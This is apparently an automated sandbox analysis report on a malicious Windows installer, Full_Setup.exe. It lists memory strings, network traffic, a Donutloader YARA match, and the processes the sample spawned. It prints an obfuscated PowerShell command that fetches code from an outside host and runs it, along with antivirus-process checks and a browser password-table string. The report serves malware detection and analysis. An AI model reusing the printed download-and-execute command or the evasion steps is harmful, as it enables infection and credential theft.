Source: powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1962949630.00000000054CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: https://jrsoftware.org/
Source: Full_Setup.exe, 00000000.00000003.1951278700.0000000003E1F000.00000004.00000800.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.exe, 00000006.00000000.2014058921.0000000000721000.00000020.00000001.01000000.00000008.sdmp, 8R65FTCZQK06W5IFC.exe.0.dr	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: https://jrsoftware.org0
Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/
Source: Full_Setup.exe, 00000000.00000002.2018287824.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf15
Source: Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/~
Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
Source: powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.trustwave.com/CA03
Source: Full_Setup.exe, 00000000.00000003.1792888136.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Full_Setup.exe, 00000000.00000003.1793159948.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792888136.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804469987.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792981516.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804628279.00000000036C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Full_Setup.exe, 00000000.00000003.1792981516.00000000036A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Full_Setup.exe, 00000000.00000003.1793159948.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792888136.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804469987.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792981516.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804628279.00000000036C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Full_Setup.exe, 00000000.00000003.1792981516.00000000036A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 8R65FTCZQK06W5IFC.exe, 00000006.00000003.2018414218.0000000002B0F000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.exe, 00000006.00000003.2027489332.000000007F1BB000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000000.2034155286.0000000000091000.00000020.00000001.01000000.00000009.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000000.2052194709.000000000075D000.00000020.00000001.01000000.0000000C.sdmp, 8R65FTCZQK06W5IFC.tmp.8.dr	String found in binary or memory: https://www.innosetup.com/
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 8R65FTCZQK06W5IFC.exe, 00000006.00000003.2018414218.0000000002B0F000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.exe, 00000006.00000003.2027489332.000000007F1BB000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000000.2034155286.0000000000091000.00000020.00000001.01000000.00000009.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000000.2052194709.000000000075D000.00000020.00000001.01000000.0000000C.sdmp, 8R65FTCZQK06W5IFC.tmp.8.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49759 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe

Window found: window name: AutoHotkey

Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_03682618	0_3_03682618
Source: C:\Users\user\Desktop\Full_Setup.exe	Code function: 0_3_0089E35E	0_3_0089E35E

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26

Source: Full_Setup.exe

Static PE information: invalid certificate

Source: Full_Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Full_Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 8R65FTCZQK06W5IFC.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 8R65FTCZQK06W5IFC.tmp.8.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: 8R65FTCZQK06W5IFC.tmp.8.dr	Static PE information: Number of sections : 11 > 10
Source: 8R65FTCZQK06W5IFC.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: 8R65FTCZQK06W5IFC.tmp.6.dr	Static PE information: Number of sections : 11 > 10

Source: Full_Setup.exe, 00000000.00000000.1670861413.0000000000520000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Setup.exe
Source: Full_Setup.exe, 00000000.00000003.1759737845.00000000030D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Setup.exe
Source: Full_Setup.exe, 00000000.00000003.1954589430.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs Full_Setup.exe
Source: Full_Setup.exe, 00000000.00000003.1954664346.0000000003E8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs Full_Setup.exe
Source: Full_Setup.exe	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Setup.exe

Source: Full_Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@59/15@4/3

Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp

File created: C:\Users\user\AppData\Roaming\ColorStreamLib

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03

Source: C:\Users\user\Desktop\Full_Setup.exe

File created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe

Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Full_Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: Full_Setup.exe, 00000000.00000003.1793066523.0000000003675000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Full_Setup.exe	Virustotal: Detection: 18%
Source: Full_Setup.exe	ReversingLabs: Detection: 26%

Source: Full_Setup.exe	String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: Full_Setup.exe	String found in binary or memory: /LoadInf=
Source: Full_Setup.exe	String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string

Source: C:\Users\user\Desktop\Full_Setup.exe

File read: C:\Users\user\Desktop\Full_Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Full_Setup.exe "C:\Users\user\Desktop\Full_Setup.exe"
Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Full_Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe"
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Process created: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp "C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$2042E,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe"
Source: C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Process created: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp "C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$90296,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Windows\System32\timeout.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
